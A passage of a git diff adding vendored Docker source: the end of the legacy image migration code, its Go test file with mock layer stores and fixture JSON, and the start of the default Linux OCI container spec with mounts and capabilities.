+			if err := migrateImage(parent, root, ls, is, ms, mappings); err != nil {
+				// todo: fail or allow broken chains?
+				return err
+			}
+			parentID = mappings[parent]
+		}
+	}
+
+	rootFS := image.NewRootFS()
+	var history []image.History
+
+	if parentID != "" {
+		parentImg, err := is.Get(parentID)
+		if err != nil {
+			return err
+		}
+
+		rootFS = parentImg.RootFS
+		history = parentImg.History
+	}
+
+	diffIDData, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, migrationDiffIDFileName))
+	if err != nil {
+		return err
+	}
+	diffID, err := digest.ParseDigest(string(diffIDData))
+	if err != nil {
+		return err
+	}
+
+	sizeStr, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, migrationSizeFileName))
+	if err != nil {
+		return err
+	}
+	size, err := strconv.ParseInt(string(sizeStr), 10, 64)
+	if err != nil {
+		return err
+	}
+
+	layer, err := ls.RegisterByGraphID(id, rootFS.ChainID(), layer.DiffID(diffID), filepath.Join(root, graphDirName, id, migrationTarDataFileName), size)
+	if err != nil {
+		return err
+	}
+	logrus.Infof("migrated layer %s to %s", id, layer.DiffID())
+
+	jsonFile := filepath.Join(root, graphDirName, id, "json")
+	imageJSON, err := ioutil.ReadFile(jsonFile)
+	if err != nil {
+		return err
+	}
+
+	h, err := imagev1.HistoryFromConfig(imageJSON, false)
+	if err != nil {
+		return err
+	}
+	history = append(history, h)
+
+	rootFS.Append(layer.DiffID())
+
+	config, err := imagev1.MakeConfigFromV1Config(imageJSON, rootFS, history)
+	if err != nil {
+		return err
+	}
+	strongID, err := is.Create(config)
+	if err != nil {
+		return err
+	}
+	logrus.Infof("migrated image %s to %s", id, strongID)
+
+	if parentID != "" {
+		if err := is.SetParent(strongID, parentID); err != nil {
+			return err
+		}
+	}
+
+	checksum, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, "checksum"))
+	if err == nil { // best effort
+		dgst, err := digest.ParseDigest(string(checksum))
+		if err == nil {
+			V2MetadataService := metadata.NewV2MetadataService(ms)
+			V2MetadataService.Add(layer.DiffID(), metadata.V2Metadata{Digest: dgst})
+		}
+	}
+	_, err = ls.Release(layer)
+	if err != nil {
+		return err
+	}
+
+	mappings[id] = strongID
+	return
+}
+
+func rawJSON(value interface{}) *json.RawMessage {
+	jsonval, err := json.Marshal(value)
+	if err != nil {
+		return nil
+	}
+	return (*json.RawMessage)(&jsonval)
+}
diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go
new file mode 100644
index 0000000000..be82fdc75e
--- /dev/null
+++ b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go
@@ -0,0 +1,438 @@
+package v1
+
+import (
+	"crypto/rand"
+	"encoding/hex"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"reflect"
+	"runtime"
+	"testing"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/reference"
+)
+
+func TestMigrateRefs(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "migrate-tags")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	ioutil.WriteFile(filepath.Join(tmpdir, "repositories-generic"), []byte(`{"Repositories":{"busybox":{"latest":"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108","sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a":"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108"},"registry":{"2":"5d165b8e4b203685301c815e95663231691d383fd5e3d3185d1ce3f8dddead3d","latest":"8d5547a9f329b1d3f93198cd661fb5117e5a96b721c5cf9a2c389e7dd4877128"}}}`), 0600)
+
+	ta := &mockTagAdder{}
+	err = migrateRefs(tmpdir, "generic", ta, map[string]image.ID{
+		"5d165b8e4b203685301c815e95663231691d383fd5e3d3185d1ce3f8dddead3d": image.ID("sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"),
+		"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108": image.ID("sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9"),
+		"abcdef3434c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108": image.ID("sha256:56434342345ae68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expected := map[string]string{
+		"busybox:latest": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9",
+		"busybox@sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9",
+		"registry:2": "sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae",
+	}
+
+	if !reflect.DeepEqual(expected, ta.refs) {
+		t.Fatalf("Invalid migrated tags: expected %q, got %q", expected, ta.refs)
+	}
+
+	// second migration is no-op
+	ioutil.WriteFile(filepath.Join(tmpdir, "repositories-generic"), []byte(`{"Repositories":{"busybox":{"latest":"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108"`), 0600)
+	err = migrateRefs(tmpdir, "generic", ta, map[string]image.ID{
+		"b3ca410aa2c115c05969a7b2c8cf8a9fcf62c1340ed6a601c9ee50df337ec108": image.ID("sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9"),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !reflect.DeepEqual(expected, ta.refs) {
+		t.Fatalf("Invalid migrated tags: expected %q, got %q", expected, ta.refs)
+	}
+}
+
+func TestMigrateContainers(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	if runtime.GOARCH != "amd64" {
+		t.Skip("Test tailored to amd64 architecture")
+	}
+	tmpdir, err := ioutil.TempDir("", "migrate-containers")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	err = addContainer(tmpdir, `{"State":{"Running":false,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":0,"ExitCode":0,"Error":"","StartedAt":"2015-11-10T21:42:40.604267436Z","FinishedAt":"2015-11-10T21:42:41.869265487Z"},"ID":"f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c","Created":"2015-11-10T21:42:40.433831551Z","Path":"sh","Args":[],"Config":{"Hostname":"f780ee3f80e6","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":null,"Cmd":["sh"],"Image":"busybox","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{}},"Image":"2c5ac3f849df8627fcf2822727f87c57f38b7129d3604fbc11d861fe856ff093","NetworkSettings":{"Bridge":"","EndpointID":"","Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"HairpinMode":false,"IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","LinkLocalIPv6Address":"","LinkLocalIPv6PrefixLen":0,"MacAddress":"","NetworkID":"","PortMapping":null,"Ports":null,"SandboxKey":"","SecondaryIPAddresses":null,"SecondaryIPv6Addresses":null},"ResolvConfPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/resolv.conf","HostnamePath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hostname","HostsPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hosts","LogPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c-json.log","Name":"/determined_euclid","Driver":"overlay","ExecDriver":"native-0.2","MountLabel":"","ProcessLabel":"","RestartCount":0,"UpdateDns":false,"HasBeenStartedBefore":false,"MountPoints":{},"Volumes":{},"VolumesRW":{},"AppArmorProfile":""}`)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// container with invalid image
+	err = addContainer(tmpdir, `{"State":{"Running":false,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":0,"ExitCode":0,"Error":"","StartedAt":"2015-11-10T21:42:40.604267436Z","FinishedAt":"2015-11-10T21:42:41.869265487Z"},"ID":"e780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c","Created":"2015-11-10T21:42:40.433831551Z","Path":"sh","Args":[],"Config":{"Hostname":"f780ee3f80e6","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":null,"Cmd":["sh"],"Image":"busybox","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{}},"Image":"4c5ac3f849df8627fcf2822727f87c57f38b7129d3604fbc11d861fe856ff093","NetworkSettings":{"Bridge":"","EndpointID":"","Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"HairpinMode":false,"IPAddress":"","IPPrefixLen":0,"IPv6Gateway":"","LinkLocalIPv6Address":"","LinkLocalIPv6PrefixLen":0,"MacAddress":"","NetworkID":"","PortMapping":null,"Ports":null,"SandboxKey":"","SecondaryIPAddresses":null,"SecondaryIPv6Addresses":null},"ResolvConfPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/resolv.conf","HostnamePath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hostname","HostsPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/hosts","LogPath":"/var/lib/docker/containers/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c/f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c-json.log","Name":"/determined_euclid","Driver":"overlay","ExecDriver":"native-0.2","MountLabel":"","ProcessLabel":"","RestartCount":0,"UpdateDns":false,"HasBeenStartedBefore":false,"MountPoints":{},"Volumes":{},"VolumesRW":{},"AppArmorProfile":""}`)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	ls := &mockMounter{}
+
+	ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	is, err := image.NewImageStore(ifs, ls)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	imgID, err := is.Create([]byte(`{"architecture":"amd64","config":{"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Cmd":["sh"],"Entrypoint":null,"Env":null,"Hostname":"23304fc829f9","Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Labels":null,"OnBuild":null,"OpenStdin":false,"StdinOnce":false,"Tty":false,"Volumes":null,"WorkingDir":"","Domainname":"","User":""},"container":"349b014153779e30093d94f6df2a43c7a0a164e05aa207389917b540add39b51","container_config":{"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Cmd":["/bin/sh","-c","#(nop) CMD [\"sh\"]"],"Entrypoint":null,"Env":null,"Hostname":"23304fc829f9","Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Labels":null,"OnBuild":null,"OpenStdin":false,"StdinOnce":false,"Tty":false,"Volumes":null,"WorkingDir":"","Domainname":"","User":""},"created":"2015-10-31T22:22:55.613815829Z","docker_version":"1.8.2","history":[{"created":"2015-10-31T22:22:54.690851953Z","created_by":"/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"},{"created":"2015-10-31T22:22:55.613815829Z","created_by":"/bin/sh -c #(nop) CMD [\"sh\"]"}],"os":"linux","rootfs":{"type":"layers","diff_ids":["sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1","sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef"]}}`))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = migrateContainers(tmpdir, ls, is, map[string]image.ID{
+		"2c5ac3f849df8627fcf2822727f87c57f38b7129d3604fbc11d861fe856ff093": imgID,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expected := []mountInfo{{
+		"f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c",
+		"f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c",
+		"sha256:c3191d32a37d7159b2e30830937d2e30268ad6c375a773a8994911a3aba9b93f",
+	}}
+	if !reflect.DeepEqual(expected, ls.mounts) {
+		t.Fatalf("invalid mounts: expected %q, got %q", expected, ls.mounts)
+	}
+
+	if actual, expected := ls.count, 0; actual != expected {
+		t.Fatalf("invalid active mounts: expected %d, got %d", expected, actual)
+	}
+
+	config2, err := ioutil.ReadFile(filepath.Join(tmpdir, "containers", "f780ee3f80e66e9b432a57049597118a66aab8932be88e5628d4c824edbee37c", "config.v2.json"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	var config struct{ Image string }
+	err = json.Unmarshal(config2, &config)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if actual, expected := config.Image, string(imgID); actual != expected {
+		t.Fatalf("invalid image pointer in migrated config: expected %q, got %q", expected, actual)
+	}
+
+}
+
+func TestMigrateImages(t *testing.T) {
+	// TODO Windows: Figure out why this is failing
+	if runtime.GOOS == "windows" {
+		t.Skip("Failing on Windows")
+	}
+	if runtime.GOARCH != "amd64" {
+		t.Skip("Test tailored to amd64 architecture")
+	}
+	tmpdir, err := ioutil.TempDir("", "migrate-images")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	// busybox from 1.9
+	id1, err := addImage(tmpdir, `{"architecture":"amd64","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"container":"23304fc829f9b9349416f6eb1afec162907eba3a328f51d53a17f8986f865d65","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"],"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"created":"2015-10-31T22:22:54.690851953Z","docker_version":"1.8.2","layer_id":"sha256:55dc925c23d1ed82551fd018c27ac3ee731377b6bad3963a2a4e76e753d70e57","os":"linux"}`, "", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	id2, err := addImage(tmpdir, `{"architecture":"amd64","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["sh"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"container":"349b014153779e30093d94f6df2a43c7a0a164e05aa207389917b540add39b51","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) CMD [\"sh\"]"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"created":"2015-10-31T22:22:55.613815829Z","docker_version":"1.8.2","layer_id":"sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4","os":"linux","parent_id":"sha256:039b63dd2cbaa10d6015ea574392530571ed8d7b174090f032211285a71881d0"}`, id1, "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	ls := &mockRegistrar{}
+
+	ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	is, err := image.NewImageStore(ifs, ls)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	ms, err := metadata.NewFSMetadataStore(filepath.Join(tmpdir, "distribution"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	mappings := make(map[string]image.ID)
+
+	err = migrateImages(tmpdir, ls, is, ms, mappings)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expected := map[string]image.ID{
+		id1: image.ID("sha256:ca406eaf9c26898414ff5b7b3a023c33310759d6203be0663dbf1b3a712f432d"),
+		id2: image.ID("sha256:a488bec94bb96b26a968f913d25ef7d8d204d727ca328b52b4b059c7d03260b6"),
+	}
+
+	if !reflect.DeepEqual(mappings, expected) {
+		t.Fatalf("invalid image mappings: expected %q, got %q", expected, mappings)
+	}
+
+	if actual, expected := ls.count, 2; actual != expected {
+		t.Fatalf("invalid register count: expected %q, got %q", expected, actual)
+	}
+	ls.count = 0
+
+	// next images are busybox from 1.8.2
+	_, err = addImage(tmpdir, `{"id":"17583c7dd0dae6244203b8029733bdb7d17fccbb2b5d93e2b24cf48b8bfd06e2","parent":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","created":"2015-10-31T22:22:55.613815829Z","container":"349b014153779e30093d94f6df2a43c7a0a164e05aa207389917b540add39b51","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) CMD [\"sh\"]"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"docker_version":"1.8.2","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["sh"],"Image":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"architecture":"amd64","os":"linux","Size":0}`, "", "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	_, err = addImage(tmpdir, `{"id":"d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498","created":"2015-10-31T22:22:54.690851953Z","container":"23304fc829f9b9349416f6eb1afec162907eba3a328f51d53a17f8986f865d65","container_config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["/bin/sh","-c","#(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"],"Image":"","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"docker_version":"1.8.2","config":{"Hostname":"23304fc829f9","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"PublishService":"","Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"VolumeDriver":"","WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":null},"architecture":"amd64","os":"linux","Size":1108935}`, "", "sha256:55dc925c23d1ed82551fd018c27ac3ee731377b6bad3963a2a4e76e753d70e57")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = migrateImages(tmpdir, ls, is, ms, mappings)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expected["d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498"] = image.ID("sha256:c091bb33854e57e6902b74c08719856d30b5593c7db6143b2b48376b8a588395")
+	expected["17583c7dd0dae6244203b8029733bdb7d17fccbb2b5d93e2b24cf48b8bfd06e2"] = image.ID("sha256:d963020e755ff2715b936065949472c1f8a6300144b922992a1a421999e71f07")
+
+	if actual, expected := ls.count, 2; actual != expected {
+		t.Fatalf("invalid register count: expected %q, got %q", expected, actual)
+	}
+
+	v2MetadataService := metadata.NewV2MetadataService(ms)
+	receivedMetadata, err := v2MetadataService.GetMetadata(layer.EmptyLayer.DiffID())
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expectedMetadata := []metadata.V2Metadata{
+		{Digest: digest.Digest("sha256:55dc925c23d1ed82551fd018c27ac3ee731377b6bad3963a2a4e76e753d70e57")},
+		{Digest: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")},
+	}
+
+	if !reflect.DeepEqual(expectedMetadata, receivedMetadata) {
+		t.Fatalf("invalid metadata: expected %q, got %q", expectedMetadata, receivedMetadata)
+	}
+
+}
+
+func TestMigrateUnsupported(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "migrate-empty")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	err = os.MkdirAll(filepath.Join(tmpdir, "graph"), 0700)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = Migrate(tmpdir, "generic", nil, nil, nil, nil)
+	if err != errUnsupported {
+		t.Fatalf("expected unsupported error, got %q", err)
+	}
+}
+
+func TestMigrateEmptyDir(t *testing.T) {
+	tmpdir, err := ioutil.TempDir("", "migrate-empty")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpdir)
+
+	err = Migrate(tmpdir, "generic", nil, nil, nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func addImage(dest, jsonConfig, parent, checksum string) (string, error) {
+	var config struct{ ID string }
+	if err := json.Unmarshal([]byte(jsonConfig), &config); err != nil {
+		return "", err
+	}
+	if config.ID == "" {
+		b := make([]byte, 32)
+		rand.Read(b)
+		config.ID = hex.EncodeToString(b)
+	}
+	contDir := filepath.Join(dest, "graph", config.ID)
+	if err := os.MkdirAll(contDir, 0700); err != nil {
+		return "", err
+	}
+	if err := ioutil.WriteFile(filepath.Join(contDir, "json"), []byte(jsonConfig), 0600); err != nil {
+		return "", err
+	}
+	if checksum != "" {
+		if err := ioutil.WriteFile(filepath.Join(contDir, "checksum"), []byte(checksum), 0600); err != nil {
+			return "", err
+		}
+	}
+	if err := ioutil.WriteFile(filepath.Join(contDir, ".migration-diffid"), []byte(layer.EmptyLayer.DiffID()), 0600); err != nil {
+		return "", err
+	}
+	if err := ioutil.WriteFile(filepath.Join(contDir, ".migration-size"), []byte("0"), 0600); err != nil {
+		return "", err
+	}
+	if parent != "" {
+		if err := ioutil.WriteFile(filepath.Join(contDir, "parent"), []byte(parent), 0600); err != nil {
+			return "", err
+		}
+	}
+	if checksum != "" {
+		if err := ioutil.WriteFile(filepath.Join(contDir, "checksum"), []byte(checksum), 0600); err != nil {
+			return "", err
+		}
+	}
+	return config.ID, nil
+}
+
+func addContainer(dest, jsonConfig string) error {
+	var config struct{ ID string }
+	if err := json.Unmarshal([]byte(jsonConfig), &config); err != nil {
+		return err
+	}
+	contDir := filepath.Join(dest, "containers", config.ID)
+	if err := os.MkdirAll(contDir, 0700); err != nil {
+		return err
+	}
+	if err := ioutil.WriteFile(filepath.Join(contDir, "config.json"), []byte(jsonConfig), 0600); err != nil {
+		return err
+	}
+	return nil
+}
+
+type mockTagAdder struct {
+	refs map[string]string
+}
+
+func (t *mockTagAdder) AddTag(ref reference.Named, id digest.Digest, force bool) error {
+	if t.refs == nil {
+		t.refs = make(map[string]string)
+	}
+	t.refs[ref.String()] = id.String()
+	return nil
+}
+func (t *mockTagAdder) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error {
+	return t.AddTag(ref, id, force)
+}
+
+type mockRegistrar struct {
+	layers map[layer.ChainID]*mockLayer
+	count  int
+}
+
+func (r *mockRegistrar) RegisterByGraphID(graphID string, parent layer.ChainID, diffID layer.DiffID, tarDataFile string, size int64) (layer.Layer, error) {
+	r.count++
+	l := &mockLayer{}
+	if parent != "" {
+		p, exists := r.layers[parent]
+		if !exists {
+			return nil, fmt.Errorf("invalid parent %q", parent)
+		}
+		l.parent = p
+		l.diffIDs = append(l.diffIDs, p.diffIDs...)
+	}
+	l.diffIDs = append(l.diffIDs, diffID)
+	if r.layers == nil {
+		r.layers = make(map[layer.ChainID]*mockLayer)
+	}
+	r.layers[l.ChainID()] = l
+	return l, nil
+}
+func (r *mockRegistrar) Release(l layer.Layer) ([]layer.Metadata, error) {
+	return nil, nil
+}
+func (r *mockRegistrar) Get(layer.ChainID) (layer.Layer, error) {
+	return nil, nil
+}
+
+type mountInfo struct {
+	name, graphID, parent string
+}
+type mockMounter struct {
+	mounts []mountInfo
+	count  int
+}
+
+func (r *mockMounter) CreateRWLayerByGraphID(name string, graphID string, parent layer.ChainID) error {
+	r.mounts = append(r.mounts, mountInfo{name, graphID, string(parent)})
+	return nil
+}
+func (r *mockMounter) Unmount(string) error {
+	r.count--
+	return nil
+}
+func (r *mockMounter) Get(layer.ChainID) (layer.Layer, error) {
+	return nil, nil
+}
+
+func (r *mockMounter) Release(layer.Layer) ([]layer.Metadata, error) {
+	return nil, nil
+}
+
+type mockLayer struct {
+	diffIDs []layer.DiffID
+	parent  *mockLayer
+}
+
+func (l *mockLayer) TarStream() (io.ReadCloser, error) {
+	return nil, nil
+}
+func (l *mockLayer) TarStreamFrom(layer.ChainID) (io.ReadCloser, error) {
+	return nil, nil
+}
+
+func (l *mockLayer) ChainID() layer.ChainID {
+	return layer.CreateChainID(l.diffIDs)
+}
+
+func (l *mockLayer) DiffID() layer.DiffID {
+	return l.diffIDs[len(l.diffIDs)-1]
+}
+
+func (l *mockLayer) Parent() layer.Layer {
+	if l.parent == nil {
+		return nil
+	}
+	return l.parent
+}
+
+func (l *mockLayer) Size() (int64, error) {
+	return 0, nil
+}
+
+func (l *mockLayer) DiffSize() (int64, error) {
+	return 0, nil
+}
+
+func (l *mockLayer) Metadata() (map[string]string, error) {
+	return nil, nil
+}
diff --git a/vendor/github.com/docker/docker/oci/defaults_linux.go b/vendor/github.com/docker/docker/oci/defaults_linux.go
new file mode 100644
index 0000000000..8b3ce7281b
--- /dev/null
+++ b/vendor/github.com/docker/docker/oci/defaults_linux.go
@@ -0,0 +1,168 @@
+package oci
+
+import (
+	"os"
+	"runtime"
+
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+func sPtr(s string) *string      { return &s }
+func iPtr(i int64) *int64        { return &i }
+func u32Ptr(i int64) *uint32     { u := uint32(i); return &u }
+func fmPtr(i int64) *os.FileMode { fm := os.FileMode(i); return &fm }
+
+// DefaultSpec returns default oci spec used by docker.
+func DefaultSpec() specs.Spec {
+	s := specs.Spec{
+		Version: specs.Version,
+		Platform: specs.Platform{
+			OS:   runtime.GOOS,
+			Arch: runtime.GOARCH,
+		},
+	}
+	s.Mounts = []specs.Mount{
+		{
+			Destination: "/proc",
+			Type:        "proc",
+			Source:      "proc",
+			Options:     []string{"nosuid", "noexec", "nodev"},
+		},
+		{
+			Destination: "/dev",
+			Type:        "tmpfs",
+			Source:      "tmpfs",
+			Options:     []string{"nosuid", "strictatime", "mode=755"},
+		},
+		{
+			Destination: "/dev/pts",
+			Type:        "devpts",
+			Source:      "devpts",
+			Options:     []string{"nosuid", "noexec", "newinstance", "ptmxmode=0666", "mode=0620", "gid=5"},
+		},
+		{
+			Destination: "/sys",
+			Type:        "sysfs",
+			Source:      "sysfs",
+			Options:     []string{"nosuid", "noexec", "nodev", "ro"},
+		},
+		{
+			Destination: "/sys/fs/cgroup",
+			Type:        "cgroup",
+			Source:      "cgroup",
+			Options:     []string{"ro", "nosuid", "noexec", "nodev"},
+		},
+		{
+			Destination: "/dev/mqueue",
+			Type:        "mqueue",
+			Source:      "mqueue",
+			Options:     []string{"nosuid", "noexec", "nodev"},
+		},
+	}
+	s.Process.Capabilities = []string{
+		"CAP_CHOWN",
+		"CAP_DAC_OVERRIDE",
+		"CAP_FSETID",
+		"CAP_FOWNER",
+		"CAP_MKNOD",
+		"CAP_NET_RAW",
+		"CAP_SETGID",
+		"CAP_SETUID",
+		"CAP_SETFCAP",
+		"CAP_SETPCAP",
+		"CAP_NET_BIND_SERVICE",
+		"CAP_SYS_CHROOT",
+		"CAP_KILL",
+		"CAP_AUDIT_WRITE",
+	}
+
+	s.Linux = &specs.Linux{
+		MaskedPaths: []string{
+			"/proc/kcore",
+			"/proc/latency_stats",
+			"/proc/timer_list",
